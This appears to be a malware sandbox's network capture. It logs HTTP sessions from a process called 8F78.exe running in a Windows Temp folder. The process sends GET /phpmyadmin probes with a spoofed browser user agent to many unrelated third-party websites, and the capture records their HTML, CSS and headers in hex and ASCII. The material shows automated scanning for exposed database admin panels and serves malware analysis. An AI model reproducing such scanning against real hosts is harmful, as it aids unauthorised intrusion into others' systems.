                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC8192INData Raw: 65 72 6c 61 72 67 65 5f 64 65 66 61 75 6c 74 2e 6a 70 67 22 2c 22 77 69 64 74 68 22 3a 31 32 30 30 2c 22 68 65 69 67 68 74 22 3a 31 33 37 32 7d 2c 22 73 75 70 65 72 6c 61 72 67 65 5f 64 65 66 61 75 6c 74 5f 32 78 22 3a 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6a 61 6e 63 6b 75 6c 69 6b 2e 73 6b 5c 2f 69 6d 67 5c 2f 70 5c 2f 73 6b 2d 64 65 66 61 75 6c 74 2d 73 75 70 65 72 6c 61 72 67 65 5f 64 65 66 61 75 6c 74 5f 32 78 2e 6a 70 67 22 2c 22 77 69 64 74 68 22 3a 31 32 30 30 2c 22 68 65 69 67 68 74 22 3a 31 33 37 32 7d 7d 2c 22 73 6d 61 6c 6c 22 3a 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6a 61 6e 63 6b 75 6c 69 6b 2e 73 6b 5c 2f 69 6d 67 5c 2f 70 5c 2f 73 6b 2d 64 65 66 61 75 6c 74 2d 63 61 72 74 5f 64 65 66 61 75 6c 74 2e 6a 70 67
                                                                                                                                                                                                                                                                                                                                Data Ascii: erlarge_default.jpg","width":1200,"height":1372},"superlarge_default_2x":{"url":"https:\/\/janckulik.sk\/img\/p\/sk-default-superlarge_default_2x.jpg","width":1200,"height":1372}},"small":{"url":"https:\/\/janckulik.sk\/img\/p\/sk-default-cart_default.jpg
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC8192INData Raw: 74 5f 32 5f 34 20 2e 65 61 73 79 5f 69 63 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 7d 23 73 74 65 61 73 79 5f 65 6c 65 6d 65 6e 74 5f 32 33 20 2e 65 61 73 79 5f 69 63 6f 6e 5f 77 69 74 68 5f 74 65 78 74 5f 32 5f 34 20 2e 65 61 73 79 5f 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 7d 23 73 74 65 61 73 79 5f 65 6c 65 6d 65 6e 74 5f 32 33 20 2e 65 61 73 79 5f 69 63 6f 6e 5f 77 69 74 68 5f 74 65 78 74 5f 32 5f 34 20 2e 65 61 73 79 5f 68 65 61 64 65 72 7b 63 6f 6c 6f 72 3a 20 23 36 36 36 36 36 36 3b 7d 23 73 74 65 61 73 79 5f 65 6c 65 6d 65 6e 74 5f 32 33 20 2e 65 61 73 79 5f 69 63 6f 6e 5f 77 69 74 68 5f 74 65 78 74 5f 32 5f 34 20 2e 65 61 73 79 5f 68 65 61 64 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b
                                                                                                                                                                                                                                                                                                                                Data Ascii: t_2_4 .easy_icon{font-size: 14px;}#steasy_element_23 .easy_icon_with_text_2_4 .easy_icon{margin-bottom: 0px;}#steasy_element_23 .easy_icon_with_text_2_4 .easy_header{color: #666666;}#steasy_element_23 .easy_icon_with_text_2_4 .easy_header{font-size: 12px;
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC8192INData Raw: 72 5f 34 2e 66 6c 61 67 5f 31 3a 62 65 66 6f 72 65 2c 20 2e 70 72 6f 5f 66 69 72 73 74 5f 62 6f 78 20 2e 73 74 5f 73 74 69 63 6b 65 72 5f 34 2e 66 6c 61 67 5f 32 3a 62 65 66 6f 72 65 7b 74 6f 70 3a 2d 30 70 78 3b 7d 2e 70 72 6f 5f 66 69 72 73 74 5f 62 6f 78 20 2e 73 74 5f 73 74 69 63 6b 65 72 5f 34 2e 66 6c 61 67 5f 31 3a 62 65 66 6f 72 65 7b 72 69 67 68 74 3a 2d 31 31 70 78 3b 7d 2e 70 72 6f 5f 66 69 72 73 74 5f 62 6f 78 20 2e 73 74 5f 73 74 69 63 6b 65 72 5f 34 2e 66 6c 61 67 5f 32 3a 62 65 66 6f 72 65 7b 6c 65 66 74 3a 2d 31 31 70 78 3b 7d 2e 73 74 5f 73 74 69 63 6b 65 72 5f 34 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 7d 2e 73 74 5f 73 74 69 63 6b 65 72 5f 32 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 7d 2e 73 74 5f 73 74 69 63 6b
                                                                                                                                                                                                                                                                                                                                Data Ascii: r_4.flag_1:before, .pro_first_box .st_sticker_4.flag_2:before{top:-0px;}.pro_first_box .st_sticker_4.flag_1:before{right:-11px;}.pro_first_box .st_sticker_4.flag_2:before{left:-11px;}.st_sticker_4{font-weight:normal;}.st_sticker_2{color:#ffffff;}.st_stick
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC8192INData Raw: 3e 3c 2f 64 69 76 3e 0a 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 74 6f 70 5f 65 78 74 72 61 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 5f 6d 65 6e 75 5f 68 61 73 5f 77 69 64 67 65 74 73 5f 31 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 74 5f 6d 65 67 61 5f 6d 65 6e 75 5f 63 6f 6e 74 61 69 6e 65 72 20 61 6e 69 6d 61 74 65 64 20 66 61 73 74 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 74 6f 70 5f 65 78 74 72 61 5f 63 6f 6e 74 61 69 6e 65 72 22 20 63 6c 61 73 73 3d 22 66 6c 65 78 5f 63 6f 6e 74 61 69 6e 65 72 20 22 3e 0a 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: ></div> <section id="top_extra" class="main_menu_has_widgets_1"> <div class=""> <div class="st_mega_menu_container animated fast"> <div class="container"> <div id="top_extra_container" class="flex_container ">
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC8192INData Raw: 6c 65 22 3e 0d 0a 3c 6c 69 3e 49 4e 46 4f 4c 49 4e 4b 41 3a c2 a0 30 34 33 2f 20 35 35 32 30 30 31 30 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 45 4d 41 49 4c 3a 20 70 72 65 64 61 6a 6e 61 40 6a 61 6e 63 6b 75 6c 69 6b 2e 73 6b 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 41 44 52 45 53 41 3a 20 48 76 69 65 7a 64 6f 73 6c 61 76 6f 76 6f 20 6e c3 a1 6d 2e 20 32 30 31 2c 20 30 32 39 20 30 31 20 4e c3 a1 6d 65 73 74 6f 76 6f 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 4f 54 56 c3 81 52 41 43 49 45 20 48 4f 44 49 4e 59 3a 20 50 6f 6e 64 65 6c 6f 6b 20 2d 20 50 69 61 74 6f 6b 20 38 3a 30 30 20 2d 20 31 36 3a 33 30 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 c2 a0 20 53
                                                                                                                                                                                                                                                                                                                                Data Ascii: le"><li>INFOLINKA:043/ 5520010</li><li>EMAIL: predajna@janckulik.sk</li><li>ADRESA: Hviezdoslavovo nm. 201, 029 01 Nmestovo</li><li>OTVRACIE HODINY: Pondelok - Piatok 8:00 - 16:30</li><li> S
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC8192INData Raw: 6c 69 6b 2e 73 6b 2f 32 32 36 2d 66 72 69 74 65 7a 79 2d 61 2d 70 65 6b 61 72 6e 65 2d 63 68 6c 65 62 61 22 20 74 69 74 6c 65 3d 22 46 72 69 74 c3 a9 7a 79 20 61 20 70 65 6b c3 a1 72 6e 65 20 63 68 6c 65 62 61 22 20 63 6c 61 73 73 3d 22 6d 6f 5f 73 75 62 5f 61 20 6d 6f 5f 6d 61 5f 6c 65 76 65 6c 5f 32 20 6d 61 5f 69 74 65 6d 20 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 74 6f 2d 61 6e 67 6c 65 2d 72 69 67 68 74 20 6c 69 73 74 5f 61 72 72 6f 77 22 3e 3c 2f 69 3e 46 72 69 74 c3 a9 7a 79 20 61 20 70 65 6b c3 a1 72 6e 65 20 63 68 6c 65 62 61 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 6f 5f 73 75 62 5f 6c 69 20 6d 6f 5f 6d 6c 5f 6c 65 76 65 6c 5f 32 20 67 72 61 6e 64 69 74
                                                                                                                                                                                                                                                                                                                                Data Ascii: lik.sk/226-fritezy-a-pekarne-chleba" title="Fritzy a pekrne chleba" class="mo_sub_a mo_ma_level_2 ma_item "><i class="fto-angle-right list_arrow"></i>Fritzy a pekrne chleba</a></div></li><li class="mo_sub_li mo_ml_level_2 grandit
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC8192INData Raw: 22 66 74 6f 2d 6d 69 6e 75 73 20 6d 69 6e 75 73 5f 73 69 67 6e 22 3e 3c 2f 69 3e 3c 2f 73 70 61 6e 3e 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 75 6c 20 63 6c 61 73 73 3d 22 6d 6f 5f 73 75 62 5f 75 6c 20 6d 6f 5f 6d 75 5f 6c 65 76 65 6c 5f 32 20 70 5f 67 72 61 6e 64 69 74 65 6d 5f 31 22 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 6f 5f 73 75 62 5f 6c 69 20 6d 6f 5f 6d 6c 5f 6c 65 76 65 6c 5f 32 20 67 72 61 6e 64 69 74 65 6d 5f 30 20 70 5f 67 72 61 6e 64 69 74 65 6d 5f 31 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 6e 75 5f 61 5f 77 72 61 70 22 3e 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 61 6e 63 6b 75 6c
                                                                                                                                                                                                                                                                                                                                Data Ascii: "fto-minus minus_sign"></i></span></div><ul class="mo_sub_ul mo_mu_level_2 p_granditem_1"><li class="mo_sub_li mo_ml_level_2 granditem_0 p_granditem_1"><div class="menu_a_wrap"><a href="https://janckul
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC8192INData Raw: 50 72 c3 ad 73 6c 75 c5 a1 65 6e 73 74 76 6f 20 6b 20 76 79 73 c3 a1 76 61 c4 8d 6f 6d 22 20 63 6c 61 73 73 3d 22 6d 6f 5f 73 75 62 5f 61 20 6d 6f 5f 6d 61 5f 6c 65 76 65 6c 5f 32 20 6d 61 5f 69 74 65 6d 20 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 74 6f 2d 61 6e 67 6c 65 2d 72 69 67 68 74 20 6c 69 73 74 5f 61 72 72 6f 77 22 3e 3c 2f 69 3e 50 72 c3 ad 73 6c 75 c5 a1 65 6e 73 74 76 6f 20 6b 20 76 79 73 c3 a1 76 61 c4 8d 6f 6d 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 6c 69 3e 0a 09 09 3c 2f 75 6c 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 75 6c 3e 09 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 75 6c 20 63 6c 61 73 73 3d 22 6d
                                                                                                                                                                                                                                                                                                                                Data Ascii: Prsluenstvo k vysvaom" class="mo_sub_a mo_ma_level_2 ma_item "><i class="fto-angle-right list_arrow"></i>Prsluenstvo k vysvaom</a></div></li></ul></li></ul><ul class="m
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:30 UTC8192INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 75 6c 20 63 6c 61 73 73 3d 22 6d 6f 5f 6d 75 5f 6c 65 76 65 6c 5f 31 20 6d 6f 5f 73 75 62 5f 75 6c 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 6f 5f 6d 6c 5f 6c 65 76 65 6c 5f 31 20 6d 6f 5f 73 75 62 5f 6c 69 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 6e 75 5f 61 5f 77 72 61 70 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 61 6e 63 6b 75 6c 69 6b 2e 73 6b 2f 35 38 2d 75 6d 79 76 61 63 6b 79 2d 72 69 61 64 75 22 20 74 69 74 6c 65 3d 22 55 6d c3 bd 76 61 c4 8d 6b 79 20 72 69 61 64 75 22 20 63 6c 61 73 73 3d 22 6d 6f 5f 6d 61 5f 6c 65 76 65 6c 5f 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: <ul class="mo_mu_level_1 mo_sub_ul"><li class="mo_ml_level_1 mo_sub_li"><div class="menu_a_wrap"><a href="https://janckulik.sk/58-umyvacky-riadu" title="Umvaky riadu" class="mo_ma_level_1


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                68192.168.2.45442735.190.10.694435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC177OUTGET /phpmyadmin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: ericrothphoto.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC564INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Content-Length: 32598
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: deviceType=desktop; Path=/; Expires=Sat, 21 Dec 2024 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Set-Cookie: devicePixelRatio=1; Path=/; Expires=Sat, 21 Dec 2024 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Set-Cookie: __fp_cjq=; Max-Age=0; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT; HttpOnly; Secure
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                ETag: HcrOQGpy95KFCSJNzxot200biBM
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                X-Request-Id: e571c7009fb511eea98b15c3a9ec319c
                                                                                                                                                                                                                                                                                                                                Server: None
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC15820INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 70 61 67 65 5f 34 30 34 22 20 64 61 74 61 2d 64 65 76 69 63 65 2d 74 79 70 65 3d 22 64 65 73 6b 74 6f 70 22 20 64 61 74 61 2d 65 6e 76 3d 22 6c 69 76 65 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 50 65 72 73 6f 6e 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 70 61 67 65 5f 34 30 34 20 64 65 73 6b 74 6f 70 20 66 75 6c 6c 42 6c 65 65 64 20 69 65 20 69 65 36 20 69 65 4c 54 45 36 20 69 65 4c 54 45 37 20 69 65 4c 54 45 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 6c
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html>...[if lt IE 7]><html lang="en" id="page_404" data-device-type="desktop" data-env="live" itemscope itemtype="http://schema.org/Person" class="no-js page_404 desktop fullBleed ie ie6 ieLTE6 ieLTE7 ieLTE8"><![endif]-->...[if IE 7]><html l
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC16384INData Raw: 51 49 62 63 4c 6a 62 55 4c 58 63 5a 66 47 63 42 62 44 31 57 43 6b 62 4c 62 45 41 32 39 37 74 75 4a 73 6c 43 6b 56 4d 32 48 65 4c 46 67 30 6c 44 39 30 46 77 4e 6b 57 6e 65 58 4d 6d 61 37 6d 70 33 4b 68 4e 79 39 35 44 75 56 53 6a 69 37 73 44 43 33 76 45 42 64 54 38 2f 6e 33 55 72 62 4c 75 2b 62 58 30 56 71 4c 6d 71 4e 65 33 62 64 43 62 4e 66 73 6f 4b 4b 47 32 64 7a 73 5a 57 78 4c 50 4f 65 4b 46 76 4c 5a 69 70 5a 6c 48 39 46 6f 54 4e 57 30 63 31 2b 75 52 62 47 43 63 42 47 45 72 6c 5a 66 57 56 75 62 76 74 4f 34 6e 71 71 4c 39 64 4b 4f 39 6f 72 63 57 37 65 74 38 4e 4b 36 48 68 75 49 59 36 4b 59 4d 5a 59 33 4c 63 4f 64 72 50 67 44 51 38 77 75 44 51 4d 69 34 6a 42 61 47 37 42 72 44 57 73 77 62 4d 30 65 4c 51 4b 41 33 39 32 2b 43 4d 74 6f 36 31 6f 59 75 4b 4a 47
                                                                                                                                                                                                                                                                                                                                Data Ascii: QIbcLjbULXcZfGcBbD1WCkbLbEA297tuJslCkVM2HeLFg0lD90FwNkWneXMma7mp3KhNy95DuVSji7sDC3vEBdT8/n3UrbLu+bX0VqLmqNe3bdCbNfsoKKG2dzsZWxLPOeKFvLZipZlH9FoTNW0c1+uRbGCcBGErlZfWVubvtO4nqqL9dKO9orcW7et8NK6HhuIY6KYMZY3LcOdrPgDQ8wuDQMi4jBaG7BrDWswbM0eLQKA392+CMto61oYuKJG
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC394INData Raw: 20 6e 61 76 49 63 6f 6e 2d 73 76 67 2d 2d 77 31 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 39 22 3e 0a 20 20 3c 6c 69 6e 65 20 63 6c 61 73 73 3d 22 6c 69 6e 65 31 22 20 78 31 3d 22 30 22 20 79 31 3d 22 30 22 20 78 32 3d 22 32 30 22 20 79 32 3d 22 30 22 2f 3e 0a 20 20 3c 6c 69 6e 65 20 63 6c 61 73 73 3d 22 6c 69 6e 65 32 22 20 78 31 3d 22 30 22 20 79 31 3d 22 34 2e 35 22 20 78 32 3d 22 32 30 22 20 79 32 3d 22 34 2e 35 22 2f 3e 0a 20 20 3c 6c 69 6e 65 20 63 6c 61 73 73 3d 22 6c 69 6e 65 33 22 20 78 31 3d 22 30 22 20 79 31 3d 22 39 22 20 78 32 3d 22 32 30 22 20 79 32 3d 22 39 22 2f 3e 0a 3c 2f 73 76 67 3e 0a 20 20 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 6f 6c 6c 65 63 74 69 6f 6e 73 2e 6a 73 22 20 64 61
                                                                                                                                                                                                                                                                                                                                Data Ascii: navIcon-svg--w1" viewBox="0 0 20 9"> <line class="line1" x1="0" y1="0" x2="20" y2="0"/> <line class="line2" x1="0" y1="4.5" x2="20" y2="4.5"/> <line class="line3" x1="0" y1="9" x2="20" y2="9"/></svg> </span></a><script src="/collections.js" da


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                69192.168.2.45445285.248.130.2004435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: sluchatka.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC551INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: https://www.sluchatka.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                                                Expect-CT: max-age=86400, enforce
                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                Permissions-Policy: geolocation=(*)
                                                                                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC178INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                70192.168.2.454412164.46.121.634435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: s-kotobuki-s.co.jp
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC269INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 23 Mar 2020 06:02:46 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "415-5a17f6251cd80"
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                Content-Length: 1045
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC1045INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 e6 8c 87 e5 ae 9a e3 81 95 e3 82 8c e3 81 9f e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab ef bc 88 55 52 4c ef bc 89 e3 81 8c e3 81 bf e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 7a 65 6e 6c 6f 67 69 63 5f 70 61
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title> 404 Not Found URL</title> <link rel="stylesheet" href="/zenlogic_pa


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                71192.168.2.45446285.248.130.2004435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: sluchatka.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC551INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: https://www.sluchatka.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                                                Expect-CT: max-age=86400, enforce
                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                Permissions-Policy: geolocation=(*)
                                                                                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
